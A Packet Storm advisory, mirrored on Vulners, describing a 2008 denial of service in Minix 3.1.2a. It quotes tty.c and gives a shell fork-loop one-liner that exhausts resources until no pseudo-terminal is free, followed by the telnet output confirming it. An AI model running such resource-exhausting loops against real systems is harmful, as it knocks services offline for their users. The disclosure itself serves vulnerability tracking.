Lucene search
K

minix-dos.txt

🗓️ 23 Jul 2008 00:00:00Reported by Knud Erik HojgaardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Minix 3.1.2a tty panic due to no free PTY lef

Code
`# kokanin@gmail 20080723  
# minix 3.1.2a tty panic  
  
trunk/src/drivers/tty/tty.c  
  
14965 if ((status = send(replyee, &tty_mess)) != OK) {  
14966 panic("TTY","tty_reply failed, status\n", status);  
  
$ uname -a  
Minix 192.168.1.2 3 1.2a i686  
$ while true ; do (yes "yes yes minix uh ah"&) ; done  
[snip snip]  
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C  
  
...disconnected  
  
telnet 192.168.1.2  
Trying 192.168.1.2...  
Connected to 192.168.1.2.  
Escape character is '^]'.  
I am sorry, but there is no free PTY left!  
Connection closed by foreign host.  
  
hai, no moar pty, kthxbye  
--  
kokanin  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2008 00:00Current
19